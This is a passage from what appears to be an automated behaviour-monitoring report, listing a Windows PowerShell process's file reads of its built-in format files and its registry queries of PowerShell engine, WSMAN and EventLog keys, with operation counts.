| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
62 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096 |
|
21 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
